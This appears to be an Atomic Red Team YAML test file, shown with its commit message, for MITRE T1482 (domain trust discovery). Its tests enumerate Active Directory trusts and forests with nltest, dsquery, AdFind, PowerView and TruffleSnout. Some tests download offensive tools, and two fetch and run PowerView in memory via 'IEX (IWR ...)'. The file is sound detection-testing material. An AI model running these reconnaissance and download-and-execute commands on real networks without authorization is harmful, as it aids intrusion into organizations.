dwhite9
06ebf05785
* Added the "-c" option to adfind commands. This will cause it to print a count of the returned objects instead of the actual objects. This is very useful for large environments and allows it run quicker without actually exposing any sensitive information. * Adding the code to allow specifying optional arguments at runtime instead of hardcoding the -c to allow more flexibility per this request: https://github.com/redcanaryco/atomic-red-team/pull/2645#pullrequestreview-1795339526 --------- Co-authored-by: dwhite <n/a> Co-authored-by: Carrie Roberts <clr2of8@gmail.com> Co-authored-by: dwhite9 <n@a>
170 lines
8.3 KiB
YAML
170 lines
8.3 KiB
YAML
attack_technique: T1482
|
|
display_name: Domain Trust Discovery
|
|
atomic_tests:
|
|
- name: Windows - Discover domain trusts with dsquery
|
|
auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f
|
|
description: |
|
|
Uses the dsquery command to discover domain trusts.
|
|
Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
dsquery * -filter "(objectClass=trustedDomain)" -attr *
|
|
name: command_prompt
|
|
- name: Windows - Discover domain trusts with nltest
|
|
auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe
|
|
description: |
|
|
Uses the nltest command to discover domain trusts.
|
|
Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
|
|
This technique has been used by the Trickbot malware family.
|
|
supported_platforms:
|
|
- windows
|
|
dependencies:
|
|
- description: |
|
|
nltest.exe from RSAT must be present on disk
|
|
prereq_command: |
|
|
WHERE nltest.exe >NUL 2>&1
|
|
get_prereq_command: |
|
|
echo Sorry RSAT must be installed manually
|
|
executor:
|
|
command: |
|
|
nltest /domain_trusts
|
|
nltest /trusted_domains
|
|
name: command_prompt
|
|
- name: Powershell enumerate domains and forests
|
|
auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
|
|
description: |
|
|
Use powershell to enumerate AD information.
|
|
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
PowerView PowerShell script must exist on disk
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
|
|
- description: |
|
|
RSAT PowerShell AD admin cmdlets must be installed
|
|
prereq_command: |
|
|
if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
Write-Host "Sorry RSAT must be installed manually"
|
|
executor:
|
|
command: |
|
|
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
|
|
Get-NetDomainTrust
|
|
Get-NetForestTrust
|
|
Get-ADDomain
|
|
Get-ADGroupMember Administrators -Recursive
|
|
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
|
|
name: powershell
|
|
- name: Adfind - Enumerate Active Directory OUs
|
|
auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec
|
|
description: |
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
optional_args:
|
|
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
executor:
|
|
command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=organizationalUnit) #{optional_args}
|
|
name: command_prompt
|
|
- name: Adfind - Enumerate Active Directory Trusts
|
|
auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834
|
|
description: |
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
optional_args:
|
|
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
executor:
|
|
command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -gcb -sc trustdmp
|
|
name: command_prompt
|
|
|
|
- name: Get-DomainTrust with PowerView
|
|
auto_generated_guid: f974894c-5991-4b19-aaf5-7cc2fe298c5d
|
|
description: |
|
|
Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose
|
|
name: powershell
|
|
|
|
- name: Get-ForestTrust with PowerView
|
|
auto_generated_guid: 58ed10e8-0738-4651-8408-3a3e9a526279
|
|
description: |
|
|
Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose
|
|
name: powershell
|
|
|
|
- name: TruffleSnout - Listing AD Infrastructure
|
|
auto_generated_guid: ea1b4f2d-5b82-4006-b64f-f2845608a3bf
|
|
description: |
|
|
Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
trufflesnout_path:
|
|
description: Path to the TruffleSnout executable
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe
|
|
domain:
|
|
description: Domain name to search on
|
|
type: string
|
|
default: '%userdomain%'
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})
|
|
prereq_command: |
|
|
if (Test-Path "#{trufflesnout_path}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -ItemType Directory (Split-Path "#{trufflesnout_path}") -Force | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile "#{trufflesnout_path}"
|
|
executor:
|
|
command: |
|
|
"#{trufflesnout_path}" forest -n #{domain}
|
|
"#{trufflesnout_path}" domain -n #{domain}
|
|
name: command_prompt
|